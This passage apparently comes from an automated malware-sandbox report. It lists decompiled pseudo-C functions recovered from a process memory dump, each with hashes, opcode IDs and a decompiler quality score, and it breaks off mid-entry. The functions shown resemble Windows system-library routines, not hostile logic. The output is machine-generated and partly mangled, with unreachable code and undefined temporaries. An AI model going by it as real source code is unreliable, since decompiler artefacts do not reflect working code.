                        			E02BD37F5(void* __ecx, intOrPtr* __edx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t6;
                        				intOrPtr _t13;
                        				intOrPtr* _t20;
                        				intOrPtr* _t27;
                        				void* _t28;
                        				intOrPtr* _t29;
                        
                        				_t27 = __edx;
                        				_t28 = __ecx;
                        				if(__edx == 0) {
                        					E02BB2280(_t6, 0x2c88550);
                        				}
                        				_t29 = E02BD387E(_t28);
                        				if(_t29 == 0) {
                        					L6:
                        					if(_t27 == 0) {
                        						E02BAFFB0(0x2c88550, _t27, 0x2c88550);
                        					}
                        					if(_t29 == 0) {
                        						return 0xc0000225;
                        					} else {
                        						if(_t27 != 0) {
                        							goto L14;
                        						}
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                        						goto L11;
                        					}
                        				} else {
                        					_t13 =  *_t29;
                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                        						L13:
                        						_push(3);
                        						asm("int 0x29");
                        						L14:
                        						 *_t27 = _t29;
                        						L11:
                        						return 0;
                        					}
                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                        					if( *_t20 != _t29) {
                        						goto L13;
                        					}
                        					 *_t20 = _t13;
                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                        					asm("btr eax, ecx");
                        					goto L6;
                        				}
                        			}












                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0b347c3ac05181b48a6ef18894420e1ec8fb955ef9f1a1b5f776b3a1820a7c7
                        • Instruction ID: 14e6ab85974064c6e8d2f7ae19496a51b0786656a5ff1144e77b545ebb54dab6
                        • Opcode Fuzzy Hash: c0b347c3ac05181b48a6ef18894420e1ec8fb955ef9f1a1b5f776b3a1820a7c7
                        • Instruction Fuzzy Hash: 8301D6B29816109BC3378B1A9940FA6BBE7DF85B6071540E9E8458B612EB32E801CFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC002D() {
                        				void* _t11;
                        				char* _t14;
                        				signed char* _t16;
                        				char* _t27;
                        				signed char* _t29;
                        
                        				_t11 = E02BB7D50();
                        				_t27 = 0x7ffe0384;
                        				if(_t11 != 0) {
                        					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t14 = 0x7ffe0384;
                        				}
                        				_t29 = 0x7ffe0385;
                        				if( *_t14 != 0) {
                        					if(E02BB7D50() == 0) {
                        						_t16 = 0x7ffe0385;
                        					} else {
                        						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t16 & 0x00000040) != 0) {
                        						goto L18;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(E02BB7D50() != 0) {
                        						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					if( *_t27 != 0) {
                        						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						if(E02BB7D50() != 0) {
                        							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        						}
                        						if(( *_t29 & 0x00000020) == 0) {
                        							goto L5;
                        						}
                        						L18:
                        						return 1;
                        					} else {
                        						L5:
                        						return 0;
                        					}
                        				}
                        			}









                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: f2b478477de8f2b8f5babb45c0473c3802d67544debf955acefeeea72a5c879a
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: EA112676205E80CFD737A728C984B3677D9EFC07A8F1A04E4DE04876D2DB28C941C660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02BA766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				char _v8;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr _t29;
                        				intOrPtr* _t30;
                        				void* _t42;
                        				intOrPtr _t47;
                        
                        				_push(__ecx);
                        				_t36 =  &_v8;
                        				if(E02BCF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                        					L10:
                        					_t22 = 0;
                        				} else {
                        					_t24 = _v8 + __ecx;
                        					_t42 = _t24;
                        					if(_t24 < __ecx) {
                        						goto L10;
                        					} else {
                        						if(E02BCF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                        							goto L10;
                        						} else {
                        							_t29 = _v8 + _t42;
                        							if(_t29 < _t42) {
                        								goto L10;
                        							} else {
                        								_t47 = _t29;
                        								_t30 = _a16;
                        								if(_t30 != 0) {
                        									 *_t30 = _t47;
                        								}
                        								if(_t47 == 0) {
                        									goto L10;
                        								} else {
                        									_t22 = L02BB4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t22;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: 3abc62b562c28cf965c5fd6b196388bf3c645538884e65584f7b6cb0b274f7a3
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: C2018432718519ABC7209E6EDC61F6FB7AEEB84760B2445E4B909CB251DE30DD01E7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02B99080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                        				intOrPtr* _t51;
                        				intOrPtr _t59;
                        				signed int _t64;
                        				signed int _t67;
                        				signed int* _t71;
                        				signed int _t74;
                        				signed int _t77;
                        				signed int _t82;
                        				intOrPtr* _t84;
                        				void* _t85;
                        				intOrPtr* _t87;
                        				void* _t94;
                        				signed int _t95;
                        				intOrPtr* _t97;
                        				signed int _t99;
                        				signed int _t102;
                        				void* _t104;
                        
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t97 = __ecx;
                        				_t102 =  *(__ecx + 0x14);
                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                        					_t102 = _t102 | 0x000007d0;
                        				}
                        				_t48 =  *[fs:0x30];
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        					_t102 = _t102 & 0xff000000;
                        				}
                        				_t80 = 0x2c885ec;
                        				E02BB2280(_t48, 0x2c885ec);
                        				_t51 =  *_t97 + 8;
                        				if( *_t51 != 0) {
                        					L6:
                        					return E02BAFFB0(_t80, _t97, _t80);
                        				} else {
                        					 *(_t97 + 0x14) = _t102;
                        					_t84 =  *0x2c8538c; // 0x77ad6888
                        					if( *_t84 != 0x2c85388) {
                        						_t85 = 3;
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c);
                        						_push(0x2c6f6e8);
                        						E02BED0E8(0x2c885ec, _t97, _t102);
                        						 *((char*)(_t104 - 0x1d)) = 0;
                        						_t99 =  *(_t104 + 8);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							L13:
                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        							if(__eflags == 0) {
                        								E02C688F5(_t80, _t85, 0x2c85388, _t99, _t102, __eflags);
                        							}
                        						} else {
                        							__eflags = _t99 -  *0x2c886c0; // 0x27307b0
                        							if(__eflags == 0) {
                        								goto L13;
                        							} else {
                        								__eflags = _t99 -  *0x2c886b8; // 0x0
                        								if(__eflags == 0) {
                        									goto L13;
                        								} else {
                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                        									__eflags =  *((char*)(_t59 + 0x28));
                        									if( *((char*)(_t59 + 0x28)) == 0) {
                        										E02BB2280(_t99 + 0xe0, _t99 + 0xe0);
                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                        										__eflags =  *((char*)(_t99 + 0xe5));
                        										if(__eflags != 0) {
                        											E02C688F5(0x2c885ec, _t85, 0x2c85388, _t99, _t102, __eflags);
                        										} else {
                        											__eflags =  *((char*)(_t99 + 0xe4));
                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                        												 *((char*)(_t99 + 0xe4)) = 1;
                        												_push(_t99);
                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                        												E02BDAFD0();
                        											}
                        											while(1) {
                        												_t71 = _t99 + 8;
                        												 *(_t104 - 0x2c) = _t71;
                        												_t80 =  *_t71;
                        												_t95 = _t71[1];
                        												 *(_t104 - 0x28) = _t80;
                        												 *(_t104 - 0x24) = _t95;
                        												while(1) {
                        													L19:
                        													__eflags = _t95;
                        													if(_t95 == 0) {
                        														break;
                        													}
                        													_t102 = _t80;
                        													 *(_t104 - 0x30) = _t95;
                        													 *(_t104 - 0x24) = _t95 - 1;
                        													asm("lock cmpxchg8b [edi]");
                        													_t80 = _t102;
                        													 *(_t104 - 0x28) = _t80;
                        													 *(_t104 - 0x24) = _t95;
                        													__eflags = _t80 - _t102;
                        													_t99 =  *(_t104 + 8);
                        													if(_t80 != _t102) {
                        														continue;
                        													} else {
                        														__eflags = _t95 -  *(_t104 - 0x30);
                        														if(_t95 !=  *(_t104 - 0x30)) {
                        															continue;
                        														} else {
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																_t74 = 0;
                        																 *(_t104 - 0x34) = 0;
                        																_t102 = 0;
                        																__eflags = 0;
                        																while(1) {
                        																	 *(_t104 - 0x3c) = _t102;
                        																	__eflags = _t102 - 3;
                        																	if(_t102 >= 3) {
                        																		break;
                        																	}
                        																	__eflags = _t74;
                        																	if(_t74 != 0) {
                        																		L49:
                        																		_t102 =  *_t74;
                        																		__eflags = _t102;
                        																		if(_t102 != 0) {
                        																			_t102 =  *(_t102 + 4);
                        																			__eflags = _t102;
                        																			if(_t102 != 0) {
                        																				 *0x2c8b1e0(_t74, _t99);
                        																				 *_t102();
                        																			}
                        																		}
                        																		do {
                        																			_t71 = _t99 + 8;
                        																			 *(_t104 - 0x2c) = _t71;
                        																			_t80 =  *_t71;
                        																			_t95 = _t71[1];
                        																			 *(_t104 - 0x28) = _t80;
                        																			 *(_t104 - 0x24) = _t95;
                        																			goto L19;
                        																		} while (_t74 == 0);
                        																		goto L49;
                        																	} else {
                        																		_t82 = 0;
                        																		__eflags = 0;
                        																		while(1) {
                        																			 *(_t104 - 0x38) = _t82;
                        																			__eflags = _t82 -  *0x2c884c0;
                        																			if(_t82 >=  *0x2c884c0) {
                        																				break;
                        																			}
                        																			__eflags = _t74;
                        																			if(_t74 == 0) {
                        																				_t77 = E02C69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                        																				__eflags = _t77;
                        																				if(_t77 == 0) {
                        																					_t74 = 0;
                        																					__eflags = 0;
                        																				} else {
                        																					_t74 = _t77 + 0xfffffff4;
                        																				}
                        																				 *(_t104 - 0x34) = _t74;
                        																				_t82 = _t82 + 1;
                        																				continue;
                        																			}
                        																			break;
                        																		}
                        																		_t102 = _t102 + 1;
                        																		continue;
                        																	}
                        																	goto L20;
                        																}
                        																__eflags = _t74;
                        															}
                        														}
                        													}
                        													break;
                        												}
                        												L20:
                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                        												 *((char*)(_t99 + 0xe5)) = 1;
                        												 *((char*)(_t104 - 0x1d)) = 1;
                        												goto L21;
                        											}
                        										}
                        										L21:
                        										 *(_t104 - 4) = 0xfffffffe;
                        										E02B9922A(_t99);
                        										_t64 = E02BB7D50();
                        										__eflags = _t64;
                        										if(_t64 != 0) {
                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        										} else {
                        											_t67 = 0x7ffe0386;
                        										}
                        										__eflags =  *_t67;
                        										if( *_t67 != 0) {
                        											_t67 = E02C68B58(_t99);
                        										}
                        										__eflags =  *((char*)(_t104 - 0x1d));
                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                        											__eflags = _t99 -  *0x2c886c0; // 0x27307b0
                        											if(__eflags != 0) {
                        												__eflags = _t99 -  *0x2c886b8; // 0x0
                        												if(__eflags == 0) {
                        													_t94 = 0x2c886bc;
                        													_t87 = 0x2c886b8;
                        													goto L27;
                        												} else {
                        													__eflags = _t67 | 0xffffffff;
                        													asm("lock xadd [edi], eax");
                        													if(__eflags == 0) {
                        														E02B99240(_t80, _t99, _t99, _t102, __eflags);
                        													}
                        												}
                        											} else {
                        												_t94 = 0x2c886c4;
                        												_t87 = 0x2c886c0;
                        												L27:
                        												E02BC9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                        											}
                        										}
                        									} else {
                        										goto L13;
                        									}
                        								}
                        							}
                        						}
                        						return E02BED130(_t80, _t99, _t102);
                        					} else {
                        						 *_t51 = 0x2c85388;
                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                        						 *_t84 = _t51;
                        						 *0x2c8538c = _t51;
                        						goto L6;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0097b6c20a0e95fdfafc57c42def5b46ef30d7b5db7747d944f9cb8a4db71242
                        • Instruction ID: 05371ce7b1ce098eaaa692cab2af48fe9398ca733691c462ce91eef2d5bc643d
                        • Opcode Fuzzy Hash: 0097b6c20a0e95fdfafc57c42def5b46ef30d7b5db7747d944f9cb8a4db71242
                        • Instruction Fuzzy Hash: F301F4B2901A148FC7199F04D840B227BA9EF41324F2281BAE515CB691C3B1DC41CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02C2C450(intOrPtr* _a4) {
                        				signed char _t25;
                        				intOrPtr* _t26;
                        				intOrPtr* _t27;
                        
                        				_t26 = _a4;
                        				_t25 =  *(_t26 + 0x10);
                        				if((_t25 & 0x00000003) != 1) {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push( *((intOrPtr*)(_t26 + 8)));
                        					_push(0);
                        					_push( *_t26);
                        					E02BD9910();
                        					_t25 =  *(_t26 + 0x10);
                        				}
                        				if((_t25 & 0x00000001) != 0) {
                        					_push(4);
                        					_t7 = _t26 + 4; // 0x4
                        					_t27 = _t7;
                        					_push(_t27);
                        					_push(5);
                        					_push(0xfffffffe);
                        					E02BD95B0();
                        					if( *_t27 != 0) {
                        						_push( *_t27);
                        						E02BD95D0();
                        					}
                        				}
                        				_t8 = _t26 + 0x14; // 0x14
                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                        				}
                        				_push( *_t26);
                        				E02BD95D0();
                        				return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: 706d16c9203c5d288a18505c450b97b0c6ee20b4aef5e53d1bb77135ada60dc8
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: BE019E72140A15BFD721AF65CC80EB7F76EFF94798F014526F21446560DB22ADA0CAA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02C64015(signed int __eax, signed int __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t10;
                        				signed int _t28;
                        
                        				_push(__ecx);
                        				_t28 = __ecx;
                        				asm("lock xadd [edi+0x24], eax");
                        				_t10 = (__eax | 0xffffffff) - 1;
                        				if(_t10 == 0) {
                        					_t1 = _t28 + 0x1c; // 0x1e
                        					E02BB2280(_t10, _t1);
                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        					E02BB2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2c886ac);
                        					E02B9F900(0x2c886d4, _t28);
                        					E02BAFFB0(0x2c886ac, _t28, 0x2c886ac);
                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                        					E02BAFFB0(0, _t28, _t1);
                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                        					}
                        					_t10 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        				}
                        				return _t10;
                        			}








                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 178e054d38f589a8e358d53b5aa795c87e203340b8a5924ac17057cc24eb52d4
                        • Instruction ID: a6274f7511dae5cbc04b4f24677a9f36987419fbfc4395b42e663af146a01afb
                        • Opcode Fuzzy Hash: 178e054d38f589a8e358d53b5aa795c87e203340b8a5924ac17057cc24eb52d4
                        • Instruction Fuzzy Hash: 4D01DF722419447FD625AB69CD80E63B7ADEF85760B000265F508C7E11CB65EC11CAE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E02C5138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x2c8d360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E02BDFA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1033;
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c821ed759becff32825e0e3987911d49df8d9d45b13b322ed61a4468af70ef0
                        • Instruction ID: dc62fea73659ef8a4269f70a7d604790acd19e0012a13599836de4eba3f24939
                        • Opcode Fuzzy Hash: 4c821ed759becff32825e0e3987911d49df8d9d45b13b322ed61a4468af70ef0
                        • Instruction Fuzzy Hash: 23015271A04618AFCB14DFA9D845FAEB7B8EF44710F044166F915EB280EA74DA41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E02C514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x2c8d360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E02BDFA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1034;
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e87c68dbe314b85b9de3b8c9c75ff4679fd42d00fd661cd5a139db3e68ac9c3
                        • Instruction ID: ced787529234343feabe2741537644f72f91921861d57587e084913d4cea8845
                        • Opcode Fuzzy Hash: 3e87c68dbe314b85b9de3b8c9c75ff4679fd42d00fd661cd5a139db3e68ac9c3
                        • Instruction Fuzzy Hash: AD019271A01258AFCB04DFA9D845FEEB7B8EF44710F444056F915EB280EA70DA40CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E02B958EC(intOrPtr __ecx) {
                        				signed int _v8;
                        				char _v28;
                        				char _v44;
                        				char _v76;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t10;
                        				intOrPtr _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_v8 =  *0x2c8d360 ^ _t29;
                        				_t10 =  *[fs:0x30];
                        				_t27 = __ecx;
                        				if(_t10 == 0) {
                        					L6:
                        					_t28 = 0x2b75c80;
                        				} else {
                        					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                        					if(_t16 == 0) {
                        						goto L6;
                        					} else {
                        						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                        					}
                        				}
                        				if(E02B95943() != 0 &&  *0x2c85320 > 5) {
                        					E02C17B5E( &_v44, _t27);
                        					_t22 =  &_v28;
                        					E02C17B5E( &_v28, _t28);
                        					_t11 = E02C17B9C(0x2c85320, 0x2b7bf15,  &_v28, _t22, 4,  &_v76);
                        				}
                        				return E02BDB640(_t11, _t17, _v8 ^ _t29, 0x2b7bf15, _t27, _t28);
                        			}
















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 593012811992c48c3c1098e61d9e6baa22d95d015f8b9a6281f0def7f24050b8
                        • Instruction ID: 44a103463b347ef7e6604e510087351a113d6fbffff597a70d08a580d1eed225
                        • Opcode Fuzzy Hash: 593012811992c48c3c1098e61d9e6baa22d95d015f8b9a6281f0def7f24050b8
                        • Instruction Fuzzy Hash: F601D431A40108DFDB24EE39D801AAFB3A9EB84224FC540F9D905A7240DF30DD05CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                        				signed char _t11;
                        				signed char* _t12;
                        				intOrPtr _t24;
                        				signed short* _t25;
                        
                        				_t25 = __edx;
                        				_t24 = __ecx;
                        				_t11 = ( *[fs:0x30])[0x50];
                        				if(_t11 != 0) {
                        					if( *_t11 == 0) {
                        						goto L1;
                        					}
                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                        					L2:
                        					if( *_t12 != 0) {
                        						_t12 =  *[fs:0x30];
                        						if((_t12[0x240] & 0x00000004) == 0) {
                        							goto L3;
                        						}
                        						if(E02BB7D50() == 0) {
                        							_t12 = 0x7ffe0385;
                        						} else {
                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t12 & 0x00000020) == 0) {
                        							goto L3;
                        						}
                        						return E02C17016(_a4, _t24, 0, 0, _t25, 0);
                        					}
                        					L3:
                        					return _t12;
                        				}
                        				L1:
                        				_t12 = 0x7ffe0384;
                        				goto L2;
                        			}








                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: bb86f2c8374ccfb1af61a7850fd167e67ab40d58c00dcc811df3ba8d21044a19
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 9B018F72204A80AFD33A871CC998F7677E8FB55758F0940E1FA29CBA91D778DC44C620
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C61074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                        				char _v8;
                        				void* _v11;
                        				unsigned int _v12;
                        				void* _v15;
                        				void* __esi;
                        				void* __ebp;
                        				char* _t16;
                        				signed int* _t35;
                        
                        				_t22 = __ebx;
                        				_t35 = __ecx;
                        				_v8 = __edx;
                        				_t13 =  !( *__ecx) + 1;
                        				_v12 =  !( *__ecx) + 1;
                        				if(_a4 != 0) {
                        					E02C6165E(__ebx, 0x2c88ae4, (__edx -  *0x2c88b04 >> 0x14) + (__edx -  *0x2c88b04 >> 0x14), __edi, __ecx, (__edx -  *0x2c88b04 >> 0x14) + (__edx -  *0x2c88b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                        				}
                        				E02C5AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                        				if(E02BB7D50() == 0) {
                        					_t16 = 0x7ffe0388;
                        				} else {
                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				if( *_t16 != 0) {
                        					_t16 = E02C4FE3F(_t22, _t35, _v8, _v12);
                        				}
                        				return _t16;
                        			}












                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e193df61bb9684bff57b7c2355fa221d1abf40360632c4a097fdd5257cc0c70d
                        • Instruction ID: d5311c43db920b27f78d89e38d9fd36e67ba96a3aba721e9526db14845f16ac6
                        • Opcode Fuzzy Hash: e193df61bb9684bff57b7c2355fa221d1abf40360632c4a097fdd5257cc0c70d
